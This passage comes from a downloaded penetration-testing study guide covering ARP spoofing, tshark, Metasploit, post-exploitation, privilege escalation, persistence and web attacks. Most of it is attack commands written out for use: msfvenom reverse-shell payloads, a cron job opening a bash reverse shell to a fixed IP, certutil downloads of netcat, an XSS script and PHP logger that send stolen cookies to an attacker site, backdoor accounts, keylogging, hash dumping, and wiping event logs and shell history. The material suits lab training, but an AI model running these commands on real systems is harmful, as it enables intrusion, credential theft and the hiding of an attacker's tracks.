4. The TLD server holds records for where to find the authoritative server to
answer the DNS request. The authoritative server is often also known as the
nameserver for the domain. For example, the name server
for tryhackme.com is kip.ns.cloudflare.com and uma.ns.cloudflare.com. You'll
often find multiple nameservers for a domain name to act as a backup in case
one goes down.
5. An authoritative DNS server is the server that is responsible for storing the
DNS records for a particular domain name and where any updates to your
domain name DNS records would be made. Depending on the record type,
the DNS record is then sent back to the Recursive DNS Server, where a local
copy will be cached for future requests and then relayed back to the original
client that made the request. DNS records all come with a TTL (Time To Live)
value. This value is a number represented in seconds that the response
should be saved for locally until you have to look it up again. Caching saves
on having to make a DNS request every time you communicate with a server.

We can use nslookup for get ip of domine

29
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

b. wireshark:

c. ARP poisoning :
What is ARP Spoofing (ARP Poisoning)
An ARP spoofing, also known as ARP poisoning, is a Man in the Middle (MitM) attack that allows
attackers to intercept communication between network devices. The attack works as follows:

30
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

1. The attacker must have access to the network. They scan the network to determine the IP
addresses of at least two devices⁠—let’s say these are a workstation and a router.
2. The attacker uses a spoofing tool, such as Arpspoof or Driftnet, to send out forged ARP
responses.
3. The forged responses advertise that the correct MAC address for both IP addresses,
belonging to the router and workstation, is the attacker’s MAC address. This fools both
router and workstation to connect to the attacker’s machine, instead of to each other.
4. The two devices update their ARP cache entries and from that point onwards, communicate
with the attacker instead of directly with each other.
5. The attacker is now secretly in the middle of all communications.

Dsniff tools :
dsniff is a collection of tools for network auditing and penetration testing.
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface> -t <target> -r <host>

d. tshark :
Tshark is a command line tool created by the Wireshark team and shares the same powerful
parsing engine as Wireshark
Which version of Tshark is installed in the lab?
tshark -v
What is the Tshark command to sniff on eth0
tshark -i eth0
How can you read this file in Tshark and display the packet list on the console?
tshark -r HTTP_traffic.pcap
How can you find the total number of packets in HTTP_traffic.pcap:
tshark -r HTTP_traffic.pcap | wc –l
Tshark command to read the first 100 packets only from HTTP_traffic.pcap
tshark -r HTTP_traffic.pcap -c 100
Print the list of protocols in HTTP_traffic.pcap
tshark -r HTTP_traffic.pcap -z io,phs –q
Command to show only the HTTP traffic from a PCAP file?
tshark -Y ‘http’ -r HTTP_traffic.pcap
Command to show only the IP packets sent from IP address 192.168.252.128 to IP address 52.32.74.91?
tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && ip.dst==52.32.74.91"
Command to print only packets containing GET requests?
tshark -r HTTP_traffic.pcap -Y “http.request.method==GET”

31
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

Command to print only packets only source IP and URL for all GET request packets?
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET" -Tfields -e frame.time -e ip.src -e
http.request.full_uri
How many HTTP packets contain the "password" string?
tshark -r HTTP_traffic.pcap -Y "http contains password”
What is the destination IP address for GET requests sent for New York Times (www.nytimes.com)?
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET && http.host==www.nytimes.com" -Tfields -e
ip.dst
What is the session ID being used by 192.168.252.128 for Amazon India store (amazon.in)?
tshark -r HTTP_traffic.pcap -Y "ip contains amazon.in && ip.src==192.168.252.128" -Tfields -e ip.src -e
http.cookie
What type of OS the machine on IP address 192.168.252.128 is using (i.e.
Windows/Linux/MacOS/Solaris/Unix/BSD)?
tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && http" -Tfields -e http.user_agent

32
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

7. metasploit:
Metasploit is the most widely used exploitation framework. Metasploit is a powerful tool that
can support all phases of a penetration testing engagement, from information gathering to
post-exploitation.

Metasploit has two main versions:


 Metasploit Pro: The commercial version that facilitates the automation and
management of tasks. This version has a graphical user interface (GUI).
 Metasploit Framework: The open-source version that works from the command line.
This room will focus on this version, installed on the AttackBox and most commonly
used penetration testing Linux distributions.

The Metasploit Framework is a set of tools that allow information gathering, scanning,
exploitation, exploit development, post-exploitation, and more. While the primary usage of
the Metasploit Framework focuses on the penetration testing domain, it is also useful for
vulnerability research and exploit development.

The main components of the Metasploit Framework can be summarized as follows;


 msfconsole: The main command-line interface.
 Modules: supporting modules such as exploits, scanners, payloads, etc.
 Tools: Stand-alone tools that will help vulnerability research, vulnerability assessment,
or penetration testing. Some of these tools are msfvenom, pattern_create and
pattern_offset. We will cover msfvenom within this module, but pattern_create and
pattern_offset are tools useful in exploit development which is beyond the scope of
this module.

This command is using for setup msfconsole


sudo apt-get update && sudo apt-get install metasploit-framework -y
sudo systemctl enable postgresql
sudo systemctl status postrgesql
sudo msfdb init
msfconsole
db_status

33
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

Search cve:<year> type:<module> platform:<system>


Search <vulnerability>
Connect -h
Workspace -h
For save the results of nmap scan will we use this option : -oX <name_file_xml>
For import the fie_xml in msf we will use this command in msfcomsole :
db_import <path_of_file>
we can see the services open by msf by command : services
we can use db_nmap in new workspace at msfconsole

a. pivoting :
after we obtain meterpreter session in first target we will search for privet ip for discover
another targets in the same netwok of target 1
shell
ifconfig ; or ipconfig (if the target is windows )
ctrl + c
run autoroute -s <ip>
backround
search port scan
use 5
set <ip>

b. apache:
1. auxiliary/scanner/http/http_version
2. auxiliary/scanner/http/http_header
3. auxiliary/scanner/http/robots_txt
4. auxiliary/scanner/http/brute_dirs
5. auxiliary/scanner/http/dir_scanner
6. auxiliary/scanner/http/dir_listing
7. auxiliary/scanner/http/files_dir
8. auxiliary/scanner/http/http_put
set PATH /data set FILENAME test.txt

34
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

set FILEDATA "Welcome To AttackDefense"


run
====
set PATH /data set FILENAME test.txt set ACTION DELETE run
9.auxiliary/scanner/http/http_login
set AUTH_URI /secure/
set VERBOSE false
run
10. auxiliary/scanner/http/apache_userdir_enum

c. mysql:
In this challenge we are going to look into the following MySQL auxiliary modules which can be useful
for MySQL enumeration and Penetration testing.
1. auxiliary/scanner/mysql/mysql_version
2. auxiliary/scanner/mysql/mysql_login
3. auxiliary/admin/mysql/mysql_enum
4. auxiliary/admin/mysql/mysql_sql
5. auxiliary/scanner/mysql/mysql_file_enum
6. auxiliary/scanner/mysql/mysql_hashdump
7. auxiliary/scanner/mysql/mysql_schemadump
8. auxiliary/scanner/mysql/mysql_writable_dirs

35
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

d. smtp:
What is the SMTP server name and banner:
nmap -sV -script banner <ip>
Connect to SMTP service using netcat and retrieve the hostname of the server (domain name):
nc <ip> 25
Does user “admin” exist on the server machine? Connect to SMTP service using netcat and check
manually.
VRFY admin@openmailbox.xyz
Does user “commander” exist on the server machine? Connect to SMTP service using netcat and check
manually.
VRFY commander@openmailbox.xyz
What commands can be used to check the supported commands/capabilities? Connect to SMTP service
using telnet and check.
telnet <ip> 25
HELO attacker.xyz
EHLO attacker.xyz
How many of the common usernames present in the dictionary
/usr/share/commix/src/txt/usernames.txt exist on the server. Use smtp-user-enum tool for this task.
smtp-user-enum -U /usr/share/commix/src/txt/usernames.txt -t <ip>
How many common usernames present in the dictionary /usr/share/metasploit-
framework/data/wordlists/unix_users.txt exist on the server. Use suitable metasploit module for this
task.
use auxiliary/scanner/smtp/smtp_enum
Connect to SMTP service using telnet and send a fake mail to root user.
telnet <ip> 25
HELO attacker.xyz
mail from: admin@attacker.xyz
rcpt to:root@openmailbox.xyz
data
Subject: Hi Root Hello,
This is a fake mail sent using telnet command.
From,
Admin
.
Send a fake mail to root user using sendemail command.

36
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

sendemail -f admin@attacker.xyz -t root@openmailbox.xyz -s <ip> -u Fakemail -m "Hi root, a fake from


admin" -o tls=no
the version harka of smtp v 2.8.9 is vulnerable to command injection
use exploit/linux/smtp/haraka
set SRVPORT 9898
set email_to root@attackdefense.test
set payload linux/x64/meterpreter_reverse_http

37
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

e. WMAP:
Wmap is plugin in msfconsole help us to automate the enumeration and vulnerability assessment in
the Metasploit like nessus
After rum msf we will use the command for using wmap :
Load wmap
Wmap have this option we will focus in modules , run site , target , vulns
wmap_modules wmap_nodes wmap_run wmap_sites wmap_targets wmap_vulns
firstly , we will use this command for add the site of targets :
wmap_sites -a <ip>
wmap_targets -t http://<ip>
we can use this command to view available targets :
wmap_sites -l <ip>
we will use this command to begin performing the web app vulnerability scan
wmap_run -t
after view the available modules of scan we can use this option for run then all automatically :
wmap_run -e

f. msfvenom:
msfvenom -a “architecture” -p "payload" lhost="ip" -f "format" -e "version of encode"
Linux Executable and Linkable Format (elf):
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
python3 -m http.server 9000
chmod +x rev_shell.elf
steps :
1- generate payload with msfvenom
2- run server http with python3 : sudo python3 -m http.server <port>

38
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

3- use madoule multi handler in msfconsole


4- put the http:// <ip>:port “ ip of attack machine” in the target machine

g. Aoutmating Metasploit:
For find the automatic file of metasploit we can go to /usr/share/metasploit-
framwork/scripts/resources , in this location has same of scripts , but we can create new file
script by using vim tool with write the same steps that we following in msfconsole and save
with extension .rc , then we can used in msfconsole by command : msfconsole -r <file>
or , we can run msfconsole in use command : resource <path_of_file>
also , we can create the script , when using msfconsole by using makerc <path_file > ,the script
will be create automatically by the last input was using in msfconsole

39
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

h. Apache Tomcat:
Apache tomcat is web server developed by java, and it typically run in port 8080 used http protocol
, the version 8.5.19 are vulnerable to RCE
for exploit that vulnerability in msf we will use this module :
use exploit/multi/http/tomcat_jsp_upload_bypass
for get meterpreter shell , will should be generate payload by msfvenom and run simple server by
python and type this command in jsp shell in the target session :
certutil -urlcache -f http://<ip>/file file
after that , we will run the multi handler in msfconsole and configurate it and execute the payload in
target : ./file

i. FTP:
vsFTP is FTP server run unix and linux , the version 2.3.4 is vulnerable
exploit/unix/ftp/vsftpd_234_backdoor

j. meterpter:
 sysinfo
 getuid
 checksum
 getenv path
 getenv term
 ps
 migrate <id>
 migrate -N <name>
 session -u 1

40
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

k. windows post exploitation :


if exploit windows with access admin privilege we can use getsystem to get system privilege
 hashdump
 show_mount
 search migrate
 search win_privs
 search enum_logged_on
 search checkvm
 search enum_application
 search enum_av
 search enum_computer
 search enum_patches
 search enum_shares
 search enable_rdp
bypass UAC:
for check the users are exiting in windows we will tap shell then use command:
net users
for check actual local group in windows : net localgroup administrators
search bypassuac_injection

impersonate:
load incognito
list_tokens -u
impersonate_token

psexec:
hashdump
search psexec
set smbuser
set smbpass

persistence:
search platforme:windows persistence_service
set session 1
any time we can use multi handler to back access in the target

enable_rdp:
for add user in windows :
net user username password /add
net localgroup groupname username /add
search enable_rdp

41
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

set sessions
change the password of user : net user <user> <password>
xfreerdp /u:<user> /p:<password> /v:<ip>

keylogging:
keyscan_start ; keyscan_dump

clearing event logs:


clearev

pivoting:
run autoroute -s <ip_network>
portfwd add -l <port_attacker> -p <port_vectim> -r <vectime_2>

42
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

l. linux post exploitation :


 /bin/bash -i
 Cat /etc/passwd
 Groups root
 cat /etc/*issue
 uname -r
 netstat -antp
 ps aux
 env
 search enum_configs
 saerch env platform :linux
 search enum_network
 search enum_protections
 search enum_system
 search checkcontainer
 search enum_users_history
 use post/multi/gather/ssh_creds
 use post/multi/gather/docker_creds
 use post/linux/gather/ecryptfs_creds
 use post/linux/gather/enum_psk
 use post/linux/gather/enum_xchat
 use post/linux/gather/phpmyadmin_credsteal
 use post/linux/gather/pptpd_chap_secrets
 use post/linux/manage/sshkey_persistence
rootkit:
chkrootkit -v
search chkrootkit
set CHKROOTKIT /bin/chkrootkit

persistence:
create new user for backdor
useradd -m <name> -s /bin/bash
add user in group root
usermod -aG root <user>
usermod -u <id> <user>
search platform:linux persistence

use post/linux/manage/sshkey_persistence
set CREATESSHFOLDER true
loot
chmod 0400 ssh_key
ssh -i ssh_key root@<ip>

43
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

8. explotation :
a. banner grabbing:
ls -la /usr/share/nmap/scripts | grep banner
nc <ip> <port>

b. searchsploit:
first thing , we should be to update the exploitdb : sudo apt-get update && apt-get install exploitdb -y
and update searchsploit : searchsploit -u
for use searchsploit the first we searched for version of service .then , we found the id of exploit file and
we will search with arg -m and id : searchsploit -m <id> , we will find the path of file
we can use -c or -t for search the available vulnerable service , also we can -e for search the
vulnerability in the system

c. using exploit manually :


after we found the script in searchsploit , we will copy the file by : searchsploit -m <id> <path> , and we
will read the file and edit the important information like ip port maybe we need to run simple server
and copy the netcat file and start nc in kali for use the file exploit

if the file code in c , c++ , c#.. we need to compile it :

the first things we will install mingw-w64 and gcc : sudo apt-get install mingw-w64, gcc

i686-w64-mingw32-gcc <file>.c -o exploit.exe -lws2_32

we can use this command for compilation or following the steps of documentation file like :

gcc -pthread <fie>.c -o exploit -lcrypt

d. netcat :
nc -nlvp 1234

nc -nv <ip> 1234

nc -nlvp 1234 > file

nc -nv <ip> 1234 < file

certutil -urlcache -f http://<ip>/nc.exe nc.exe

this’s cheat sheet for reverse shell : Reverse Shell Cheat Sheet - Payloads All The Things
(swisskyrepo.github.io)

Online - Reverse Shell Generator (revshells.com)

44
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

e. black box explotation :


 nmap -PA -sCV -p- <ip> -oX scan
 db_import <path of xml file >
 ls -la /usr/share/nmap/scripts/ | grep <service>

for ftp we can do this steps :

 enumeration
 brute force
 login in ftp sever
 generate payload by msfvenom , put payload , setup handler .

for ssh we can do this steps :

 enumeration

 brute force

 ssh_login

for mysql

 enum
 brute force
 mysql -u <user> -p <password> -h <host>
 show database;
 use <database> ;
 show tables;
 select * from <table>;
 UPDATE wp_users SET user_pass = MD5('password123') WHERE user_login = 'admin';
 http://<TARGET-IP>/8585/wordpress/wp-admin

45
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

9. Post explotation :
1. Windows Local Enumeration:
The most command:

 getuid
 sysinfo
 hostname
 systeminfo
 wmic qfe get Caption,Description,HotFixID,InstalledON
 getprivs

for enum users and groups:

 search logged_on
 whoami /priv
 query user
 net users
 net user administrator
 net localgroup

for enum network information

 ipconfig /all
 route print
 arp -a
 netstat -ano
 netsh firewall show state
 netsh advfirewall firewall state show

for enum process and services :

 ps
 net start
 wmic service list brief
 tasklist /SVC
 schtasks /query /fo LIST

for automate the local enumeration :

GitHub - 411Hall/JAWS: JAWS - Just Another Windows (Enum) Script

Copy the script ,then past it in notepad and save it with extension ps1 , go to tmp directory or create it

In upload the script : powershell -ExecutionPolicy bypass -File ./<file>.ps1 -OutputFile <file>.txt

46
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

2. linux Local Enumeration:


The most command:

 /bin/bash -i
 hostname
 cat /etc/issue
 cat /etc/*release
 uname -a
 unmae -r
 env
 lscpu
 free -h
 df -h
 dpkg – l

for enum users and groups:

 groups
 cat /etc/passwd
 useradd bob -s /bin/bash
 useradd -m bob -s /bin/bash
 usemod -aG root bob
 lastlog

for enum network information:

 ifconfig
 netstat
 route
 cat /etc/network
 ip a s
 cat /etc/hostname
 cat /etc/resolv.conf
 arp -a

for enum process and cron jobs :

 ps
 pgrep <service>
 pas aux
 top
 crontab -l
 ls -a /etc/cron*

for automate the local enumeration :

 search enum_config
 search enum_network

47
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

 search enum_system
 search checkvm

LinEnum/LinEnum.sh at master · rebootuser/LinEnum · GitHub

Copy the script ,then past it in notepad and save it with extension sh , go to tmp directory or create it

3. Transferring Files To Windows & Linux Targets:


 python -m SimpleHTTPServer 80
 python3 -m http.server 80
 certutil -urlcache -f http://<ip> <output>
 wget http://<ip>

to get bash shell we can use python : python -c ‘import pty; pty.spawn(“/bin/bash”)’

if perl installed : perl -e ‘exec “/bin/bash”;’

ruby: exec “/bin/bash”

48
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

4. Windows Privilege Escalation:


GitHub - itm4n/PrivescCheck: Privilege Escalation Enumeration Script for Windows

Commands: powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" use


exploit/windows/misc/hta_server

use exploit/windows/misc/hta_server

5. linux Privilege Escalation:


find / -not -type l -perm -o+w

openssl passwd -1 -salt abc password

6. Windows Persistence:
 Search persistence
 Run getgui -e -u <user> -p <password>

7. linux Persistence:
 scp student@<ip>:~/.ssh/id_rsa .
 chmod 400 id_rsa

Check the running processes : ps -eaf

 echo “***** /bin/bash -c ‘bash -i >& /dev/tcp/192.160.120.2/1234 0>&1’” > cron


 echo "* * * * * cd /home/student/ && python -m SimpleHTTPServer" > cron
 crontab -i cron
 crontab -l

8. Dumping & Cracking Windows Hashes:


 Hashdump

For crack the hash , we can use john or hashcat for get password :

 John –format=NT <file> --wordlist=rokyou.txt


 Hashcat -a3 -m 1000 <file> <wordlist>

9. Dumping & Cracking linux Hashes:


 search hashdump
 john –format=sha512crypt <file> --wordlist=rokyou.txt
 hashcat -a3 -m 1800 <file> <wordlist>

10. pivoting :
 run autoroute -s ip/subnet
 run autoroute -p
 search port scan
 portfwd add -l 1234 -p 80 -r <ip2>
 nmap -sV -p 1234 localhost

11. clearn tracks :


 resource <script> ; clear

49
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

 history -c

10. web explotation :


 nc -v <domine> port
 openssl s_client -connect target.site:443
 httprint -P0 -h <target hosts > -s <signature file>
 nslookup

The most common HTTP methods are: • GET • POST • HEAD • PUT • DELETE

GET is used to request a resource. When a user wants to open a web page, the browser sends a GET
request.

POST is used to submit HTML form data. POST parameters must be in the message body.

HEAD is very similar to GET, as it asks just headers of the response instead of the response body.

PUT is used to upload a file to the server. As you can imagine, it is a very dangerous feature if it is allowed
and misconfigured.

DELETE is used to remove a file from the server; this is another feature that must be configured wisely as
a misused DELETE leads to denial of service and data loss.

OPTIONS is used to query the web server for enabled HTTP Verbs.

 wc <file>
 dibuster
 dirb <domine>
 curl -x get <ip>
 curl -I <ip>
 curl -X OPTIONS -v
 curl -X POST -d ‘name=<>&password<>’ -v
 curl -X PUT <site> –upload-file <file>
 curl -X DELETE <site>

by using burpsuite , after setup it , in proxy request click right and send to repeater for edit the request

 gobuster dir -u http://<ip> -w <wordlist> -b 403,404 -x <extenstion> -r

by using burpsuite , after setup it , in intruder

GET /§name§ HTTP/1.0

Cookie: c=cval

Content-Length: 17

50
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

a. cross site scripting (xss):


Cross Site Scripting (XSS) is a vulnerability that lets an attacker control some of the content of a web
application. By exploiting a Cross Site Scripting, the attacker can target the web application users.

XSS vulnerabilities happen when a web application uses unfiltered user input to build the output content
displayed to its end users; this lets an attacker control the output HTML and JavaScript code, thus
attacking the application users.

To exploit an XSS vulnerability that you find, you need to know the type of cross-site scripting attack you
are carrying out. Cross-site scripting vulnerabilities can be reflected, persistent or DOM Based.

Reflected attacks:
happen when the malicious payload is carried inside the request that the browser of the victim sends to
the vulnerable website. They could be triggered by posting a link on a social network or via a phishing
campaign. When users click on the link, they trigger the attack.

The search form XSS we have seen in the previous example is a reflected cross-site scripting vulnerability.
In that example, we could craft a link to the search page and embed the payload in the find GET
parameter. http://victim.site/search.php?find=

Persistent XSS attacks


occur when the payload is sent to the vulnerable web server and then stored. When a web page of the
vulnerable website pulls the stored malicious code and puts it within the HTML output, it will deliver the XSS
payload. It is called persistent because the malicious code gets delivered each and every time a web browser
hits the “injected” web page.

This is a very dangerous form of XSS because, with a single attack, the hacker can exploit multiple web
application users. If an attacker manages to write a malicious payload (HTML or JavaScript) on a social
network page, every user visiting that page will run the payload!

The most common vector for persistent attacks are HTML forms that submit content to the web server
and then display that content back to the users. Elements such as comments, user profiles, and forum
posts are a potential vector for XSS attacks.

<script> alert('xss') </script

Cookie Stealing via XSS:


As you know from the Web Applications module, JavaScript can access cookies if they do not have the
HttpOnly flag enabled; this means that an XSS attack can be used to steal the cookies. In many cases,
stealing a cookie means stealing a user session!

For example, you can display the current cookies with <script>alert(document.cookie)</script>

With the following code, you can send cookies content to an attacker-controlled site:

<script>

var i = new Image();

i.src="http://attacker.site/log.php?q="+document.cookie;

</script>

51
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

"http://attacker.site/log.php?q="+document.cookie

The log.php script saves the cookie in a text file on the attacker.site:

<?php

$filename="/tmp/log.txt";

$fp=fopen($filename, 'a');

$cookie=$_GET['q'];

fwrite($fp, $cookie);

fclose($fp);

?>

 <img src=x onclick=alert("xss")>


 <script>alert("xss")</sript>
 <svg onload=prompt("xss")>
 <img
src=https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.p
ng onmouseover=confirm("xss")>
 <script>new image().src=’http://ip/h.php?id=’ +document.cookie</script>

https://github.com/payloadbox/xss-payload-list

 <script>document.body.innerhtml=”<b><h1>hacked</h1></b>”</script>

b. sql injection (xss):


SQL Injection (SQLi) attacks allow an unauthorized user to take control over SQL statements used by a
web application.

A SQL statement looks like the following: SELECT name, description FROM products WHERE id=9;

You also need to know the UNION command, which performs a union between two results:

<SELECT statement> UNION <other SELECT statement>;

The previous examples show how to use SQL when querying a database directly from its console. To
perform the same tasks from within a web application, the application must:

• Connect to the database

• Submit the query to the database

• Retrieve the results Then, the application logic can use the results.

The following code contains a PHP example of a connection to a MySQL database and the execution of a
query:

$dbhostname='1.2.3.4';

52
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

$dbuser='username';

$dbpassword='password';

$dbname='database';

$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);

$query = "SELECT Name, Description FROM Products WHERE ID='3' UNION SELECT Username,

Password FROM Accounts;";

$results = mysqli_query($connection, $query);

display_results($results);

However, most of the time queries are not static, they are indeed dynamically built by using users' inputs.
Here you can find a vulnerable dynamic query example:

$id = $_GET['id']; $connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);


$query = "SELECT Name, Description FROM Products WHERE ID='$id';"; $results =
mysqli_query($connection, $query); display_results($results);

The dynamic query we see below: SELECT Name, Description FROM Products WHERE ID='$id';

But, what if an attacker crafts a $id value which can change the query to something like: ' OR 'a'='a

The query then becomes:

SELECT Name, Description FROM Products WHERE ID='' OR 'a'='a';

c. ZAPorxy:
 The first things in zaporxy ,we will ad the ip in the manulle exploit and launch the browser
,after that , we can to specific url and add it ,
 Right click on the POST request, navigate to "Include in Context" and select on "Default
Context" ,
 Click on the Authentication tab under Default Context menu and select "Form-based
Authentication" for the selected method.
 Set the Username parameter to "login" and Enter "Login" in the "Regex pattern identified
in Logged Out response messages".
 Click on the "Add" button and add a new user with username "bee" and password "bug"
 Right click on the Site (http://<ip>), navigate to "Include in Context" and select on "Default
Context
 Click on the "OK" button. Right click on the Site (http://<ip>), navigate to Attack and select
"Spider".
 A dialog box will appear, select the "bee" user and click on "Start Scan" button.
 Right click on the Site (http://<ip>), navigate to Attack and select "Active Scan".
 After the scan completes, click on the "Alerts" tab

d. nikito:
 nkito -h http://<ip>

53
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

 nkito -h http://<ip> -T <options>


 nkito -h http://<ip> -T <option> -o <outbot> -Format htm

e. sqlmap:
sqlmap -u "<page>" --cookie "<cookie>" -p <variable>

sqlmap -r <file> -p <variable>

Use the sqlmap to get a list of databases present on the database server.

 sqlmap -u "<page>” --cookie "<cookie>" -p <variable> --dbs

Use the sqlmap to get the list of columns in the users table of bWAPP database

 sqlmap -u "<page>” --cookie "<cookie>" -p <variable> -D <data_base> -T users -columns

Use the sqlmap to dump password and email for admin from the users table. Press ‘n’ twice when
prompted:

 sqlmap -u "<page>” --cookie "<cookie>" -p <variable> -D <data_base> -T users -C


admin,password,email --dump

54
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

f. XSSer:
xsser --url 'http://<url> -p '<parrametre>

Trying various XSS payloads by using XSSer's “--auto” option.

 xsser --url 'http://<url> -p '<parrametre> --auto

Using custom XSS payload

 xsser --url 'http://<url> -p '<parrametre> -Fp "<script>alert(1)</script>"

Feed the url and cookie to the xsser tool for scanning. Replace hello string with XSS, this is done so that
XSSer will substitute the payload in place of the value "XSS"

 xsser –url “<url>” –cookie=”<cookie>”

g. attacking form:
 hydra -L usernames -P passwords <IP> http-post-form
"/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid
credentials or user not activated!"
 Click on Start Burp , end the intercepted request to intruder. Click on the Load button to load
the password list located at wordlist ,

55
Downloaded by Wokwok (werkingpcrequest@gmail.com)
lOMoARcPSD|51490668

2. Addition methods and technic :


Using ssh2john let us crack the private key and find the passphrase:

 python3 ssh2john.py id_rsa > hash


 john –wordlist=/root/wordlist –format=ssh /root/hash

What I like to do is upload the shell script called linpeas. We’re gonna upload that script into the victim
machine and make the quick scan using python simple server.

 /opt/PEAS/linPEAS/linpeas.sh

56
Downloaded by Wokwok (werkingpcrequest@gmail.com)

You might also like